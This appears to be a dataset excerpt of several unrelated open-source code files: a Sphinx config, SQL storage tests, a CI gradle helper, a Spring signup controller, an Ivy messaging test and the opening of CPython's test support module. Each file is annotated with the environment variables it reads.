[
"\"ABOT_ENV\"",
"\"ABOT_PATH\""
] |
[] |
[
"ABOT_ENV",
"ABOT_PATH"
] |
[]
|
["ABOT_ENV", "ABOT_PATH"]
|
go
| 2 | 0 | |
docs/conf.py
|
import datetime
import importlib
import inspect
import sys
import os
year = datetime.datetime.now().strftime('%Y')
sys.path.insert(0, os.path.abspath('..'))
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.settings')
import django
django.setup()
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.inheritance_diagram',
'sphinx.ext.intersphinx',
'sphinx.ext.linkcode',
]
def linkcode_resolve(domain, info):
"""Link source code to GitHub."""
project = 'django-dataexporter'
github_user = 'lenarother'
head = 'master'
if domain != 'py' or not info['module']:
return None
filename = info['module'].replace('.', '/')
mod = importlib.import_module(info['module'])
basename = os.path.splitext(mod.__file__)[0]
if basename.endswith('__init__'):
filename += '/__init__'
item = mod
lineno = ''
for piece in info['fullname'].split('.'):
item = getattr(item, piece)
try:
lineno = '#L%d' % inspect.getsourcelines(item)[1]
except (TypeError, IOError):
pass
return ('https://github.com/%s/%s/blob/%s/%s.py%s' %
(github_user, project, head, filename, lineno))
intersphinx_mapping = {
'python': ('http://docs.python.org/3.6', None),
'django': ('https://docs.djangoproject.com/en/dev/',
'https://docs.djangoproject.com/en/dev/_objects/'),
}
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'django-dataexporter'
copyright = '%s, Magdalena Rother' % year
exclude_patterns = ['_build']
pygments_style = 'sphinx'
def skip(app, what, name, obj, skip, options):
if name == '__init__' and obj.__doc__:
return False
return skip
def setup(app):
app.connect('autodoc-skip-member', skip)
autodoc_default_flags = ['members', 'show-inheritance']
autodoc_member_order = 'bysource'
inheritance_graph_attrs = dict(rankdir='TB')
inheritance_node_attrs = dict(shape='rect', fontsize=14, fillcolor='gray90',
color='gray30', style='filled')
inheritance_edge_attrs = dict(penwidth=0.75)
html_theme = 'default'
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
tests/plugins/test_sql.py
|
import os
import pytest
import datetime
import sqlalchemy as sa
from frictionless import Table, Package, Resource, exceptions
from frictionless.plugins.sql import SqlDialect, SqlStorage
from dotenv import load_dotenv
load_dotenv(".env")
# Parser
def test_table_sql(database_url):
dialect = SqlDialect(table="data")
with Table(database_url, dialect=dialect) as table:
assert table.schema == {
"fields": [
{"constraints": {"required": True}, "name": "id", "type": "integer"},
{"name": "name", "type": "string"},
],
"primaryKey": ["id"],
}
assert table.header == ["id", "name"]
assert table.read_data() == [[1, "english"], [2, "中国人"]]
def test_table_sql_order_by(database_url):
dialect = SqlDialect(table="data", order_by="id")
with Table(database_url, dialect=dialect) as table:
assert table.header == ["id", "name"]
assert table.read_data() == [[1, "english"], [2, "中国人"]]
def test_table_sql_order_by_desc(database_url):
dialect = SqlDialect(table="data", order_by="id desc")
with Table(database_url, dialect=dialect) as table:
assert table.header == ["id", "name"]
assert table.read_data() == [[2, "中国人"], [1, "english"]]
def test_table_sql_table_is_required_error(database_url):
table = Table(database_url)
with pytest.raises(exceptions.FrictionlessException) as excinfo:
table.open()
error = excinfo.value.error
assert error.code == "dialect-error"
assert error.note.count("'table' is a required property")
def test_table_sql_headers_false(database_url):
dialect = SqlDialect(table="data")
with Table(database_url, dialect=dialect, headers=False) as table:
assert table.header == []
assert table.read_data() == [["id", "name"], [1, "english"], [2, "中国人"]]
def test_table_sql_write(database_url):
source = "data/table.csv"
dialect = SqlDialect(table="name", order_by="id")
with Table(source) as table:
table.write(database_url, dialect=dialect)
with Table(database_url, dialect=dialect) as table:
assert table.header == ["id", "name"]
assert table.read_data() == [[1, "english"], [2, "中国人"]]
# Storage
def test_storage_types(database_url):
engine = sa.create_engine(database_url)
prefix = "prefix_"
# Export/Import
source = Package("data/storage/types.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"}, # type fallback
{"name": "array", "type": "string"}, # type fallback
{"name": "boolean", "type": "boolean"},
{"name": "date", "type": "date"},
{"name": "date_year", "type": "date"}, # format removal
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"}, # type fallback
{"name": "geojson", "type": "string"}, # type fallback
{"name": "geopoint", "type": "string"}, # type fallback
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "string"}, # type fallback
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"}, # type downgrade
{"name": "yearmonth", "type": "string"}, # type fallback
],
}
# Assert data
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": '["Mike", "John"]',
"boolean": True,
"date": datetime.date(2015, 1, 1),
"date_year": datetime.date(2015, 1, 1),
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": '{"type": "Point", "coordinates": [33, 33.33]}',
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": '{"chars": 560}',
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
def test_storage_integrity(database_url):
engine = sa.create_engine(database_url)
prefix = "prefix_"
# Export/Import
source = Package("data/storage/integrity.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata (main)
assert target.get_resource("integrity_main").schema == {
"fields": [
# added required
{"name": "id", "type": "integer", "constraints": {"required": True}},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
"primaryKey": ["id"],
"foreignKeys": [
{"fields": ["parent"], "reference": {"resource": "", "fields": ["id"]}}
],
}
# Assert metadata (link)
assert target.get_resource("integrity_link").schema == {
"fields": [
# added required
{"name": "main_id", "type": "integer", "constraints": {"required": True}},
# added required; removed unique
{"name": "some_id", "type": "integer", "constraints": {"required": True}},
# removed unique
{"name": "description", "type": "string"},
],
"primaryKey": ["main_id", "some_id"],
"foreignKeys": [
{
"fields": ["main_id"],
"reference": {"resource": "integrity_main", "fields": ["id"]},
}
],
}
# Assert data (main)
assert target.get_resource("integrity_main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
# Assert data (link)
assert target.get_resource("integrity_link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
# Cleanup storage
storage.delete_package(target.resource_names)
def test_storage_constraints(database_url):
engine = sa.create_engine(database_url)
prefix = "prefix_"
# Export/Import
source = Package("data/storage/constraints.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string", "constraints": {"required": True}},
{"name": "minLength", "type": "string"}, # constraint removal
{"name": "maxLength", "type": "string"}, # constraint removal
{"name": "pattern", "type": "string"}, # constraint removal
{"name": "enum", "type": "string"}, # constraint removal
{"name": "minimum", "type": "integer"}, # constraint removal
{"name": "maximum", "type": "integer"}, # constraint removal
],
}
# Assert data
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.parametrize(
"field_name, cell",
[
("required", ""),
("minLength", "bad"),
("maxLength", "badbadbad"),
("pattern", "bad"),
("enum", "bad"),
("minimum", 3),
("maximum", 9),
],
)
def test_storage_constraints_not_valid_error(database_url, field_name, cell):
engine = sa.create_engine(database_url)
package = Package("data/storage/constraints.json")
resource = package.get_resource("constraints")
# We set an invalid cell to the data property
for index, field in enumerate(resource.schema.fields):
if field.name == field_name:
resource.data[1][index] = cell
# NOTE: should we wrap these exceptions?
with pytest.raises(sa.exc.IntegrityError):
resource.to_sql(engine=engine, force=True)
def test_storage_read_resource_not_existent_error(database_url):
engine = sa.create_engine(database_url)
storage = SqlStorage(engine=engine)
with pytest.raises(exceptions.FrictionlessException) as excinfo:
storage.read_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
def test_storage_write_resource_existent_error(database_url):
engine = sa.create_engine(database_url)
resource = Resource(path="data/table.csv")
storage = resource.to_sql(engine=engine)
with pytest.raises(exceptions.FrictionlessException) as excinfo:
storage.write_resource(resource)
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("already exists")
# Cleanup storage
storage.delete_package(list(storage))
def test_storage_delete_resource_not_existent_error(database_url):
engine = sa.create_engine(database_url)
storage = SqlStorage(engine=engine)
with pytest.raises(exceptions.FrictionlessException) as excinfo:
storage.delete_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
def test_storage_views_support(database_url):
engine = sa.create_engine(database_url)
engine.execute("CREATE VIEW data_view AS SELECT * FROM data")
storage = SqlStorage(engine=engine)
resource = storage.read_resource("data_view")
assert resource.schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "name", "type": "string"},
]
}
assert resource.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
# Storage (PostgreSQL)
@pytest.mark.ci
def test_postgresql_storage_types():
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/types.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"}, # type fallback
{"name": "array", "type": "object"}, # type downgrade
{"name": "boolean", "type": "boolean"},
{"name": "date", "type": "date"},
{"name": "date_year", "type": "date"}, # format removal
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"}, # type fallback
{"name": "geojson", "type": "object"}, # type downgrade
{"name": "geopoint", "type": "string"}, # type fallback
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "object"},
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"}, # type downgrade
{"name": "yearmonth", "type": "string"}, # type fallback
],
}
# Assert data
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": None, # TODO: fix array
"boolean": True,
"date": datetime.date(2015, 1, 1),
"date_year": datetime.date(2015, 1, 1),
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": {"type": "Point", "coordinates": [33, 33.33]},
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": {"chars": 560},
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.ci
def test_postgresql_storage_integrity():
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/integrity.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata (main)
assert target.get_resource("integrity_main").schema == {
"fields": [
# added required
{"name": "id", "type": "integer", "constraints": {"required": True}},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
"primaryKey": ["id"],
"foreignKeys": [
{"fields": ["parent"], "reference": {"resource": "", "fields": ["id"]}}
],
}
# Assert metadata (link)
assert target.get_resource("integrity_link").schema == {
"fields": [
# added required
{"name": "main_id", "type": "integer", "constraints": {"required": True}},
# added required; removed unique
{"name": "some_id", "type": "integer", "constraints": {"required": True}},
# removed unique
{"name": "description", "type": "string"},
],
"primaryKey": ["main_id", "some_id"],
"foreignKeys": [
{
"fields": ["main_id"],
"reference": {"resource": "integrity_main", "fields": ["id"]},
}
],
}
# Assert data (main)
assert target.get_resource("integrity_main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
# Assert data (link)
assert target.get_resource("integrity_link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
# Cleanup storage
storage.delete_package(target.resource_names)
# TODO: recover enum support
@pytest.mark.ci
@pytest.mark.skip
def test_postgresql_storage_constraints(database_url):
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/constraints.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string", "constraints": {"required": True}},
{"name": "minLength", "type": "string"}, # constraint removal
{"name": "maxLength", "type": "string"}, # constraint removal
{"name": "pattern", "type": "string"}, # constraint removal
{"name": "enum", "type": "string"}, # constraint removal
{"name": "minimum", "type": "integer"}, # constraint removal
{"name": "maximum", "type": "integer"}, # constraint removal
],
}
# Assert data
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.ci
@pytest.mark.parametrize(
"field_name, cell",
[
("required", ""),
("minLength", "bad"),
("maxLength", "badbadbad"),
("pattern", "bad"),
("enum", "bad"),
("minimum", 3),
("maximum", 9),
],
)
def test_postgresql_storage_constraints_not_valid_error(database_url, field_name, cell):
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
package = Package("data/storage/constraints.json")
resource = package.get_resource("constraints")
# We set an invalid cell to the data property
for index, field in enumerate(resource.schema.fields):
if field.name == field_name:
resource.data[1][index] = cell
with pytest.raises((sa.exc.IntegrityError, sa.exc.DataError)):
resource.to_sql(engine=engine, force=True)
@pytest.mark.ci
def test_postgresql_storage_views_support():
engine = sa.create_engine(os.environ["POSTGRESQL_URL"])
engine.execute("DROP VIEW IF EXISTS data_view")
engine.execute("DROP TABLE IF EXISTS data")
engine.execute("CREATE TABLE data (id INTEGER PRIMARY KEY, name TEXT)")
engine.execute("INSERT INTO data VALUES (1, 'english'), (2, '中国人')")
engine.execute("CREATE VIEW data_view AS SELECT * FROM data")
storage = SqlStorage(engine=engine)
resource = storage.read_resource("data_view")
assert resource.schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "name", "type": "string"},
]
}
assert resource.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
# Storage (MySQL)
@pytest.mark.ci
def test_mysql_storage_types():
engine = sa.create_engine(os.environ["MYSQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/types.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"}, # type fallback
{"name": "array", "type": "string"}, # type fallback
{"name": "boolean", "type": "integer"}, # type downgrade
{"name": "date", "type": "date"},
{"name": "date_year", "type": "date"}, # format removal
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"}, # type fallback
{"name": "geojson", "type": "string"}, # type fallback
{"name": "geopoint", "type": "string"}, # type fallback
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "string"}, # type fallback
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"}, # type downgrade
{"name": "yearmonth", "type": "string"}, # type fallback
],
}
# Assert data
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": '["Mike", "John"]',
"boolean": True,
"date": datetime.date(2015, 1, 1),
"date_year": datetime.date(2015, 1, 1),
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": '{"type": "Point", "coordinates": [33, 33.33]}',
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": '{"chars": 560}',
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
# TODO: fix unique for MySQL
@pytest.mark.ci
@pytest.mark.skip
def test_mysql_storage_integrity():
engine = sa.create_engine(os.environ["MYSQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/integrity.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata (main)
assert target.get_resource("integrity_main").schema == {
"fields": [
# added required
{"name": "id", "type": "integer", "constraints": {"required": True}},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
"primaryKey": ["id"],
"foreignKeys": [
{"fields": ["parent"], "reference": {"resource": "", "fields": ["id"]}}
],
}
# Assert metadata (link)
assert target.get_resource("integrity_link").schema == {
"fields": [
# added required
{"name": "main_id", "type": "integer", "constraints": {"required": True}},
# added required; removed unique
{"name": "some_id", "type": "integer", "constraints": {"required": True}},
# removed unique
{"name": "description", "type": "string"},
],
"primaryKey": ["main_id", "some_id"],
"foreignKeys": [
{
"fields": ["main_id"],
"reference": {"resource": "integrity_main", "fields": ["id"]},
}
],
}
# Assert data (main)
assert target.get_resource("main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
# Assert data (link)
assert target.get_resource("link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
# Cleanup storage
storage.delete_package(target.resource_names)
# TODO: fix enum for MySQL
@pytest.mark.ci
@pytest.mark.skip
def test_mysql_storage_constraints():
engine = sa.create_engine(os.environ["MYSQL_URL"])
prefix = "prefix_"
# Export/Import
source = Package("data/storage/constraints.json")
storage = source.to_sql(engine=engine, prefix=prefix, force=True)
target = Package.from_sql(engine=engine, prefix=prefix)
# Assert metadata
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string", "constraints": {"required": True}},
{"name": "minLength", "type": "string"}, # constraint removal
{"name": "maxLength", "type": "string"}, # constraint removal
{"name": "pattern", "type": "string"}, # constraint removal
{"name": "enum", "type": "string"}, # constraint removal
{"name": "minimum", "type": "integer"}, # constraint removal
{"name": "maximum", "type": "integer"}, # constraint removal
],
}
# Assert data
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
# TODO: fix consratins for MySQL
@pytest.mark.ci
@pytest.mark.skip
@pytest.mark.parametrize(
"field_name, cell",
[
("required", ""),
("minLength", "bad"),
("maxLength", "badbadbad"),
("pattern", "bad"),
("enum", "bad"),
("minimum", 3),
("maximum", 9),
],
)
def test_mysql_storage_constraints_not_valid_error(field_name, cell):
engine = sa.create_engine(os.environ["MYSQL_URL"])
package = Package("data/storage/constraints.json")
resource = package.get_resource("constraints")
# We set an invalid cell to the data property
for index, field in enumerate(resource.schema.fields):
if field.name == field_name:
resource.data[1][index] = cell
# NOTE: should we wrap these exceptions?
with pytest.raises(sa.exc.IntegrityError):
resource.to_sql(engine=engine, force=True)
@pytest.mark.ci
def test_mysql_storage_views_support():
engine = sa.create_engine(os.environ["MYSQL_URL"])
engine.execute("DROP VIEW IF EXISTS data_view")
engine.execute("DROP TABLE IF EXISTS data")
engine.execute("CREATE TABLE data (id INTEGER PRIMARY KEY, name TEXT)")
engine.execute("INSERT INTO data VALUES (1, 'english'), (2, '中国人')")
engine.execute("CREATE VIEW data_view AS SELECT * FROM data")
storage = SqlStorage(engine=engine)
resource = storage.read_resource("data_view")
assert resource.schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "name", "type": "string"},
]
}
assert resource.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
|
[] |
[] |
[
"MYSQL_URL",
"POSTGRESQL_URL"
] |
[]
|
["MYSQL_URL", "POSTGRESQL_URL"]
|
python
| 2 | 0 | |
ci/fireci/fireci/gradle.py
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import subprocess
import sys
from . import stats
_logger = logging.getLogger('fireci.gradle')
ADB_INSTALL_TIMEOUT = '5'
def P(name, value):
"""Returns name and value in the format of gradle's project property cli argument."""
return '-P{}={}'.format(name, value)
@stats.measure_call('gradle')
def run(*args, gradle_opts='', workdir=None):
"""Invokes gradle with specified args and gradle_opts."""
new_env = dict(os.environ)
if gradle_opts:
new_env['GRADLE_OPTS'] = gradle_opts
new_env[
'ADB_INSTALL_TIMEOUT'] = ADB_INSTALL_TIMEOUT # 5 minutes, rather than 2 minutes
stats.propagate_context_into(new_env)
command = ['./gradlew'] + list(args)
_logger.info('Executing gradle command: "%s" in directory: "%s"',
" ".join(command), workdir if workdir else '.')
return subprocess.check_call(
command,
cwd=workdir,
env=new_env,
)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
src/main/java/com/lambdaschool/backend/controllers/OpenController.java
|
package com.lambdaschool.backend.controllers;
import com.lambdaschool.backend.models.User;
import com.lambdaschool.backend.models.UserMinimum;
import com.lambdaschool.backend.models.UserRoles;
import com.lambdaschool.backend.services.RoleService;
import com.lambdaschool.backend.services.UserService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpEntity;
import org.springframework.http.HttpHeaders;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.http.ResponseEntity;
import org.springframework.util.LinkedMultiValueMap;
import org.springframework.util.MultiValueMap;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.client.RestTemplate;
import org.springframework.web.servlet.support.ServletUriComponentsBuilder;
import springfox.documentation.annotations.ApiIgnore;
import javax.servlet.http.HttpServletRequest;
import javax.validation.Valid;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
/**
* The class allows access to endpoints that are open to all users regardless of authentication status.
* Its most important function is to allow a person to create their own username
*/
@RestController
public class OpenController
{
/**
* A method in this controller adds a new user to the application so needs access to User Services to do this.
*/
@Autowired
private UserService userService;
/**
* A method in this controller adds a new user to the application with the role User so needs access to Role Services to do this.
*/
@Autowired
private RoleService roleService;
/**
* This endpoint always anyone to create an account with the default role of USER. That role is hardcoded in this method.
*
* @param httpServletRequest the request that comes in for creating the new user
* @param newminuser A special minimum set of data that is needed to create a new user
* @return The token access and other relevent data to token access. Status of CREATED. The location header to look up the new user.
* @throws URISyntaxException we create some URIs during this method. If anything goes wrong with that creation, an exception is thrown.
*/
@PostMapping(value = "/createnewuser",
consumes = {"application/json"},
produces = {"application/json"})
public ResponseEntity<?> addSelf(
HttpServletRequest httpServletRequest,
@Valid
@RequestBody
UserMinimum newminuser)
throws
URISyntaxException
{
// Create the user
User newuser = new User();
newuser.setUsername(newminuser.getUsername());
newuser.setPassword(newminuser.getPassword());
newuser.setPrimaryemail(newminuser.getPrimaryemail());
// add the default role of user
Set<UserRoles> newRoles = new HashSet<>();
newRoles.add(new UserRoles(newuser,
roleService.findByName("user")));
newuser.setRoles(newRoles);
newuser = userService.save(newuser);
// set the location header for the newly created resource
// The location comes from a different controller!
HttpHeaders responseHeaders = new HttpHeaders();
URI newUserURI = ServletUriComponentsBuilder.fromUriString(httpServletRequest.getServerName() + ":" + httpServletRequest.getLocalPort() + "/users/user/{userId}")
.buildAndExpand(newuser.getUserid())
.toUri();
responseHeaders.setLocation(newUserURI);
// return the access token
// To get the access token, surf to the endpoint /login just as if a client had done this.
RestTemplate restTemplate = new RestTemplate();
String requestURI = "http://" + httpServletRequest.getServerName() +
(httpServletRequest.getServerName().equalsIgnoreCase("localhost") ? ":" + httpServletRequest.getLocalPort() : "") +
"/login";
List<MediaType> acceptableMediaTypes = new ArrayList<>();
acceptableMediaTypes.add(MediaType.APPLICATION_JSON);
HttpHeaders headers = new HttpHeaders();
headers.setContentType(MediaType.APPLICATION_FORM_URLENCODED);
headers.setAccept(acceptableMediaTypes);
headers.setBasicAuth(System.getenv("OAUTHCLIENTID"),
System.getenv("OAUTHCLIENTSECRET"));
MultiValueMap<String, String> map = new LinkedMultiValueMap<>();
map.add("grant_type",
"password");
map.add("scope",
"read write trust");
map.add("username",
newminuser.getUsername());
map.add("password",
newminuser.getPassword());
HttpEntity<MultiValueMap<String, String>> request = new HttpEntity<>(map,
headers);
String theToken = restTemplate.postForObject(requestURI,
request,
String.class);
return new ResponseEntity<>(theToken,
responseHeaders,
HttpStatus.CREATED);
}
/**
* Prevents no favicon.ico warning from appearing in the logs. @ApiIgnore tells Swagger to ignore documenting this as an endpoint.
*/
@ApiIgnore
@GetMapping("favicon.ico")
public void returnNoFavicon()
{
}
}
|
[
"\"OAUTHCLIENTID\"",
"\"OAUTHCLIENTSECRET\""
] |
[] |
[
"OAUTHCLIENTID",
"OAUTHCLIENTSECRET"
] |
[]
|
["OAUTHCLIENTID", "OAUTHCLIENTSECRET"]
|
java
| 2 | 0 | |
tests/pprzlink01.py
|
#! /usr/bin/python3
import os
import sys
import argparse
import time
import signal
from ivy.std_api import *
import logging
PPRZ_HOME = os.getenv("PAPARAZZI_HOME", os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../')))
sys.path.append(PPRZ_HOME + "/var/lib/python")
from pprzlink.ivy import IvyMessagesInterface
from pprzlink.message import PprzMessage
from pprzlink import messages_xml_map
try:
msgs = messages_xml_map.get_msgs('test')
except Exception as e:
print(e)
dico = messages_xml_map.message_dictionary
for msg_type in dico.keys():
for msg in dico[msg_type]:
print(msg_type, ":", msg)
ac_id = 24
ivyInterface = IvyMessagesInterface()
time.sleep(0.5)
world = None
uavid = None
def callback01(ac_id, msg, request_id):
print(request_id, msg)
def callback02(ac_id, msg):
print(msg)
ivyInterface.subscribe(callback01, '(.* WORLD_ENV_REQ .*)')
ivyInterface.subscribe(callback02, '(.* GPS .*)')
signal.signal(signal.SIGINT, lambda frame, sig: ivyInterface.stop())
|
[] |
[] |
[
"PAPARAZZI_HOME"
] |
[]
|
["PAPARAZZI_HOME"]
|
python
| 1 | 0 | |
Lib/test/support/__init__.py
|
"""Supporting definitions for the Python regression tests."""
if __name__ != 'test.support':
raise ImportError('support must be imported from the test package')
import asyncio.events
import collections.abc
import contextlib
import datetime
import errno
import faulthandler
import fnmatch
import functools
import gc
import importlib
import importlib.util
import io
import logging.handlers
import nntplib
import os
import platform
import re
import shutil
import socket
import stat
import struct
import subprocess
import sys
import sysconfig
import tempfile
import _thread
import threading
import time
import types
import unittest
import urllib.error
import warnings
from .testresult import get_test_runner
try:
import multiprocessing.process
except ImportError:
multiprocessing = None
try:
import zlib
except ImportError:
zlib = None
try:
import gzip
except ImportError:
gzip = None
try:
import bz2
except ImportError:
bz2 = None
try:
import lzma
except ImportError:
lzma = None
try:
import resource
except ImportError:
resource = None
__all__ = [
# globals
"PIPE_MAX_SIZE", "verbose", "max_memuse", "use_resources", "failfast",
# exceptions
"Error", "TestFailed", "ResourceDenied",
# imports
"import_module", "import_fresh_module", "CleanImport",
# modules
"unload", "forget",
# io
"record_original_stdout", "get_original_stdout", "captured_stdout",
"captured_stdin", "captured_stderr",
# filesystem
"TESTFN", "SAVEDCWD", "unlink", "rmtree", "temp_cwd", "findfile",
"create_empty_file", "can_symlink", "fs_is_case_insensitive",
# unittest
"is_resource_enabled", "requires", "requires_freebsd_version",
"requires_linux_version", "requires_mac_ver", "check_syntax_error",
"TransientResource", "time_out", "socket_peer_reset", "ioerror_peer_reset",
"transient_internet", "BasicTestRunner", "run_unittest", "run_doctest",
"skip_unless_symlink", "requires_gzip", "requires_bz2", "requires_lzma",
"bigmemtest", "bigaddrspacetest", "cpython_only", "get_attribute",
"requires_IEEE_754", "skip_unless_xattr", "requires_zlib",
"anticipate_failure", "load_package_tests", "detect_api_mismatch",
"check__all__", "skip_unless_bind_unix_socket",
"ignore_warnings",
# sys
"is_jython", "is_android", "check_impl_detail", "unix_shell",
"setswitchinterval",
# network
"HOST", "IPV6_ENABLED", "find_unused_port", "bind_port", "open_urlresource",
"bind_unix_socket",
# processes
'temp_umask', "reap_children",
# logging
"TestHandler",
# threads
"threading_setup", "threading_cleanup", "reap_threads", "start_threads",
# miscellaneous
"check_warnings", "check_no_resource_warning", "check_no_warnings",
"EnvironmentVarGuard",
"run_with_locale", "swap_item",
"swap_attr", "Matcher", "set_memlimit", "SuppressCrashReport", "sortdict",
"run_with_tz", "PGO", "missing_compiler_executable", "fd_count",
]
class Error(Exception):
"""Base class for regression test exceptions."""
class TestFailed(Error):
"""Test failed."""
class ResourceDenied(unittest.SkipTest):
"""Test skipped because it requested a disallowed resource.
This is raised when a test calls requires() for a resource that
has not be enabled. It is used to distinguish between expected
and unexpected skips.
"""
@contextlib.contextmanager
def _ignore_deprecated_imports(ignore=True):
"""Context manager to suppress package and module deprecation
warnings when importing them.
If ignore is False, this context manager has no effect.
"""
if ignore:
with warnings.catch_warnings():
warnings.filterwarnings("ignore", ".+ (module|package)",
DeprecationWarning)
yield
else:
yield
def ignore_warnings(*, category):
"""Decorator to suppress deprecation warnings.
